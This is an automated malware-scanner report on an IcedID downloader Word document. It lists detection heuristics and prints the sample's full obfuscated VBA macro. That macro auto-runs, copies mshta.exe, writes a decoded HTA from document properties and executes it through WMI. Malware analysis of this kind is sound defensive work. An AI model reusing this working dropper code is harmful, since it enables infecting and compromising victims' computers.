Verdict: MALICIOUS
Risk score: 170
Heuristics (6):
- ClamAV: Doc.Downloader.IcedID-87f88705f807f878-9951567-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.IcedID-87f88705f807f878-9951567-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project (VBA macros present).
- CreateObject call (high, OLE_VBA_CREATEOBJ): Matched line in script: `CreateObject(aSLsc2).create (aR2aD)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): Matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13289 bytes | 9ec18f55769278f370182ac5ecb7687181b16af4ddaa5e2893bdc73dfa0c3ce8 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aZvQ72"
Function aogb8(aGN4Yp)
' Limitless chan
' Corsican institutes motorola
' Meddling sublime halloween outdone bilious
' Abstractions fiasco
' Taciturn ken
' Pittsburgh sr mediterranean furtherance
' Civic cohen awkwardness ll
' Weights printable sid buttocks
' Edgar subjective tyler altered
' Infant cask rosa
' Doggedly esoteric
aksiq = aGN4Yp
aoRaVy = Len(aksiq)
For aJUNPF = 0 To aoRaVy - 1
' Solutions obviate glow latina
' Veteran
' Celt studious
' Suggestions lugger antiquated training intersect
' Ducal mats trestle
' Perugia lighting sapphire
' Honors mobile paid
' Pound middling meddlesome oil
' Read hostel purchasing switched
' Understanding
' Produced ge permission intractable
aTRtB = aTRtB & Mid(aksiq, (aoRaVy - aJUNPF), 1)
Next aJUNPF
aogb8 = aTRtB
End Function
Public Function a6c8rA(a5A2n)
a6c8rA = Replace(a5A2n, aKwk3A, "")
End Function
Sub AutoOpen()
' Intangible strange
aAhVs
End Sub
Attribute VB_Name = "azZr8C"
Public Const ajVTDf As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const aKwk3A As String = ")"
Public Const aDd4Z5 As Integer = 925 - 912
Function asIgnU()
End Function
Sub a8aO2(aDUpi)
' Otter jaunt extermination zip groundwork
' Quizzical thrown intermediate afflict passed
' Church uh immigration
' Families
' Ci armoury enacting
' Assignment gradually
' Steppe undisciplined ons guys
' Ogre culminated irrelevant
' Evade remarkable spurn vg aquiline
' Cassock typically intense
' Zee restored tit smirk classifieds observations
' Sally shorts
' Joan purchase docility
' Hark arena
' Movies friesland effulgent
' Antiquary
' Sets restructuring indianapolis
' Inferno validity
' Rebel
' Suddenly snorted
' Lars controls nigeria trinidad tier cod
' Shorn telecom rewritten newcastle
' Writer introduces sen
' Conventual writings rating butts abortion
' Midnight tangible complement
' Detestation batch
' Imprison compression
' Copying kennedy
' Isa group
' Democratic
' Belied porcupine fib reflective
' Jacket episode facial chary
' Opportune mysterious
' Protege drive abstaining information
' Libraries bourgeoisie lobby highways analytical
' Deadlock husbandman
' Hurrah inferiority supervisors manse straightforward
' Tacked million
' Oldest domineering junk
' Event
' Focuses knell wilderness
' Giuseppe
' Sarah duet materials
' Norse minimize cities
' Cio voluble roe mali chase
' Upheaval copyist
' Trolley dee
' Doom punctilious invest swarthy ww circles
' Disease
' Alienate deemed fully aberration
' Enamel transaction world
' Correlated peck
' Ladle watson huddle assigned
' Loot goto else
' Phases bewilder chalice
' Acclamations planes
' Avi atlas trickle statements
' Subtlety anticipated infinitesimal opprobrious www groups
' Porpoise wrapper inquisitiveness alternate
' Unfavourable
' Twitter villages randy deciduous grumble
' Crew spike
' Increase
' Atrocity
' Stationery
' Russell sitemap idioms lm cities
' Defensible insistence drove cleaning ericsson circumstances
' Liz narrative oracular
' Dress
' Trend sinewy
' Squalid adviser improvise wigwam colin hope
' Protocols adjust ranging of
' Adoring contrition genealogy
' Criterion hatter execute mains
' Tx
' Condo pave nutten
' Eulogium motherhood pitiable event whomsoever
End Sub
Function aqMVHD(alpORU)
' Runner register yugoslavia
aqMVHD = ActiveDocument.BuiltInDocumentProperties(alpORU)
End Function
Public Sub aJBE0()
If -418 + 482 < 228 Then
Call aOyT2
End If
End Sub
Public Sub aWNbiM()
If -418 + 482 < 228 Then
Call aIO8w
End If
End Sub
Attribute VB_Name = "asaYK"
Public Function adPVE(aVTnkv, axSCWy)
' Georgian
' Membership elation partners statutes scrawled
' Whales overhaul vivacious venues
' Inventory diary
' Pigeon denver fingers hunger
' Spleen roland
' Giraffe reasons cyber informal blazoned
' Scarecrow frontpage
' Ebooks thereunto canvas cripple
' Postmark leicestershire
' Repeat beautify
' Lottery epitome something
' Roseate ks semicircular
' Flimsy air files downtown
' Copyrighted yachts
' Simultaneous ha python
' Christina
' Conscripts annotation
' Residents clusters functional
' Duffer lp
' Docs queue
' Notes fix hesitancy receptors castaway
' Allure amanda blackguard diagram
' Hoary succor prefixed trellis paperbacks
' Anthology forty-three alf years beehive apt
' Matting
' Additional metamorphosis curvature
' Lars correlation parameters spiritual
' Quell stitch lusitania provides tableaux
' Adjustment
' Eruption heidi allan
FileNumber = FreeFile
Open aVTnkv For Output As #FileNumber
' Feasible padlock communism closely
' Denounce islam
' Weedy des swirling permissible grenada
' Telephony exeter hip lincolnshire abolitionists
' Figure respiratory connective
' Mechanics micah paid
' Spokesman wagon
' Wearisome declination band hydra
' Fbi northeast theoretically natalie
' But
' Envelope
' Greek hobart establish
' Mixing tattooed mc
' Tamil allurement jimmy
' Thereabout compatibility contraction
' Fully sa
' Dollar nuclear
' Watts holster undecided tropic
' Said worship enlargement moira paths
' Forward
' Phases composite absent
Print #FileNumber, axSCWy
Close #FileNumber
End Function
Sub ax7BC(aYf20, acO0iY)
' Afflict
' Expansys relying revenge anchorage stubble largest
' Hallowed toga chubby scan
' Scudding preference globe evenly homepage
' Blake 555 revolting capabilities paxil identity
' Nome entirely
' Dover bygone streams opinion literacy mac peat
' Hammock gps tell browsing
' Realistic pew extradition absence
' Jonathan lurch
' Zigzag telephone roulette
' Valuation
' Republic iceland alkali
' Hip stats stereo notebook euripides
' Painted ideas displace
' Horrible inflammation
' Pod smelting
' Epic determines
' Son towing helicopter password
' Briefly vista
' Constitute comp scabbard brawny
' Unfriendly claret vats understanding digestive
' Intuitive ointment
' Alarm casket pb xerxes
FileCopy aYf20, acO0iY
End Sub
Function aEpcz(aogwKz)
aEpcz = aogwKz
End Function
Attribute VB_Name = "ahSsy"
Sub aAhVs()
aJBE0
' Championships triple
' Loudness mixed alex fraud
' Shower juice inserted geologist saturday gaudy
' Unpopular arabia
' Dauphin revealed matrix
' Elliott millions
' Beaux basement funding restriction ho cholesterol
' Georgian doggedly ideal msgstr
' Norwegian qualifying moves
' Total dais liz
' Extraordinary insistence quicksilver
aWNbiM
' Sail camcorder unconventional commodities
' Erudition flashers
' Mel hearths mindful
' Saint mechanisms grouse bicycle gymnastic
' Acquirement f lite
' Arcade sucks
' Performer wizard
' Skating disclaimed choral den detract
' Myself instrumental living democritus lexmark
' Wigwam sulky neo
' Overcast wn
' Fantasy hard concepts immobile
' Dividend
' Circular benz nude promoter amiability
' Hard-headed medicaid kidnapping fp glaze machinist
' Postal dispel
' Clifton parasite
' Supplement festivals sucked superstructure seneca parts belie
' Assured ones microwave bulbous cumbersome
' Tits anatomy
' Orpheus
' Atop legally capabilities
' Descriptive genome
' Venom overseas phone rss
' Jacky minx recipient
' Continuity promenade coll
' Ids startup browser
' Inquisitively odd bid zurich chafe
' Dw lotus medicine layers
' Slum incite mc fatuous
' Raven part category creator documented
' Upside urw quantity guatemala ours
' Beverages epilogue cms befit convenience filling
' Shaving hardcover traditionally
' Scared squad routine
' Mosquitoes intermediate
' Wav trickle express hungarian
' Aqueous slipper receives wren
' Ill-advised
' Pelt rush suppose controlled teach separation neptune
' Extraction modem awful
' Candidates thumbs caller incorporate caps
aSLsc2 = a6c8rA(aogb8(ajVTDf))
CreateObject(aSLsc2).create (aR2aD)
End Sub
Attribute VB_Name = "aX8JzP"
Function agURh1()
agURh1 = VBA.Split(aogb8("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function ab0Xiq(aTn59)
aTvyU = agURh1()
' Circus lorenz burly time
' Cheapest
' Robin
' Accords beach succumb decrease harvest
' Rudolph forego atmosphere lucas
' Hungarian arousing throb serial
' Cull tablet budapest acquirement faultless needed
' Worshipping nakedness retrospective snowboard
' Vg ste. alerts gay skating asian
' Presidential tenets suspension aggregation
' Interests pseudonym nba
' Tornado founded irksome
Select Case aTn59
' Ups jelsoft
Case 0:
' Evacuate periodically forty-three
ab0Xiq = aTvyU(1)
Case 1:
ab0Xiq = aTvyU(2)
' Middling denomination
' Unblemished insurance bugle himalayas full
' Divx tut suite
' Valuables
' Line experts watershed phones newest
' Reciprocate fight week radiate column da
' Nubia welkin cree
' Chirp regime sanskrit horse
' Breakwater larry fiat ball
' Real
' Basketball nicaragua serenade
Case 2:
' Capriciously mutilation stiffen suffer algeria
' Absence listed
' Revenues infidel glade
' Holocaust afterthought rrp contributors
' Mother-in-law mysql
' Stroke constitute
' Scoff yawned
' Piecemeal assist profits
' Preserve
' Although
' Using chimerical christ
ab0Xiq = aTvyU(3)
End Select
End Function
Sub aIO8w()
aboJx = ayLs7U(ab0Xiq(2))
adPVE aboJx, aWOhru(aqMVHD("comments"))
End Sub
Attribute VB_Name = "aBRdo1"
Function aD9mE(abZvT9)
' Wildfire soonest respondent
aD9mE = a6c8rA(abZvT9)
End Function
Function as8Y5(aw6f13)
' Dude lender
as8Y5 = (a6c8rA(aw6f13))
End Function
Function ayLs7U(ajE5oi)
ayLs7U = (a6c8rA(ajE5oi))
End Function
Function aR2aD()
abhpE = as8Y5(ab0Xiq(1))
ayLgAt = ayLs7U(ab0Xiq(2))
aR2aD = abhpE & " " & ayLgAt
End Function
Sub aOyT2()
aI1hBK = aD9mE(ab0Xiq(0))
abhpE = as8Y5(ab0Xiq(1))
ax7BC aI1hBK, abhpE
End Sub
Function anXqy2(a8FEn)
anXqy2 = a8FEn + -82 + 108
End Function
Function akqfE(a3sZD)
If a3sZD = 0 Then
akqfE = 12995 / 12995
' Profession strings unlikely beliefs
' Optimal refugees grades
' Custom vampire productivity
' Mounting witch popularity thistle
' Conducts genres operates
' Stephen able
' Shops turbid aquiline diminutive updating hosea capitulation
' Safe opportunities fertilized playboy
' Lighten demarcation
' Between
' Bolting matched
' Contracting queenly
' Carlo asses consultation
' Aniline pedagogue
' Outlined marianne serenade
' Loam sunstroke bones orientation
' Purge long-winded furlong messenger restaurants brass
' Soulless cute potency
' Fibre three-cornered usurper ntsc make
' Blouse knowledge
' Misconduct healthful fornication rhythm nw
' Magnify zigzag rape
' Avidity
' Wag pantheism inactivity
' Loathsome reflective testing
ElseIf a3sZD = 5 Then
akqfE = -85 + 182
Else
akqfE = 512 * 2
End If
End Function
Function aqzNgM(a8FEn, aDxH7w)
aqzNgM = a8FEn - aDxH7w
End Function
Function aRlZ0N(a8FEn)
aRlZ0N = Chr(a8FEn)
End Function
Attribute VB_Name = "aFpqN9"
Function aWOhru(aoEM2) As String
Dim a9uUT6 As Long
Dim anTj2 As Integer
Dim aHVXR9 As Integer
For a9uUT6 = 1 To VBA.Len(aoEM2) Step 1
aHVXR9 = 0
aflCM1 = Mid(aoEM2, a9uUT6, 1)
anTj2 = Asc(aflCM1)
' Prepared agog creeper justice
' Maui aroma seller roma authority
' Sin benefit
' Gravitation goes debris
' Snail proc inexorably lid centurion
' Overt attempt saint litany
' Harried inserting
' Semester rides
' Na sexcam canvassing impetuosity dido
' Analyze freely quilt
' Slum potato
' Gild trumpeter
' Luxury passed employ
' Tons raise
' Nextel fireplace
' Lustful masque primate mecca fustian cooking sound
' Arcadian quantum
' Floral syntax predicate chose searching
' Nugget relationship stupid
' Treo rice exuberance risks tracked
' Safe-conduct mu
' Plaza wallace unseemly autocratic
' Lasting mysterious ef wallow qua
' Amaryllis thumbnails dicks
' Goods lyrics v
' Chronicle pension sale dui dollars
' Prohibited windpipe anachronism warrior
' Forty-eight monty ha claim
' Hale effigy
' Switch hub mother accuracy
' Cosmetics philanthropic
' Dies rides
' Fatherless precipitation
If (anTj2 > 64 And anTj2 < 91) Or (anTj2 > 96 And anTj2 < 123) Then
' Glen romeo civilian generally sacrament
aHVXR9 = aDd4Z5
' Goth.
' Sucks bygones v putty
' Without influenza expedite lurch
' Scenes intrust arrangement transvaal tumble
' Boc discussed searched appreciative terrain
' Lip palisades advertisement verification
' Drop combated testator sp tee sh
' Governing keen
' Landward pa relationship retrograde
' Baize flounder evasively
' Fertilized playwright
anTj2 = aqzNgM(anTj2, aHVXR9)
If anTj2 < akqfE(5) And anTj2 > 83 Then
anTj2 = anXqy2(anTj2)
ElseIf anTj2 < -231 + 296 Then
anTj2 = anXqy2(anTj2)
End If
End If
' Adams doctor
agjS41 = aRlZ0N(anTj2)
Mid$(aoEM2, a9uUT6, 1) = aEpcz(agjS41)
Next
aWOhru = aoEM2
End Function

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 53760 bytes | 3253a4ffe63ac2c7f6995fb51d696fbd1a0aed199a853014511ba68588f4d405 |